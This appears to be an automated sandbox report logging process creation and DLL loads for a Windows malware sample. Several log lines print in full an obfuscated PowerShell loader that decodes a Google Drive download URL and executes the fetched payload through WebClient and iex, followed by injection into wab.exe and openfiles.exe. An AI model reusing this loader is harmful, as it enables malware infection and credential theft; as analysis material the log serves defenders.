ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\openfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
Source: C:\Windows\SysWOW64\openfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
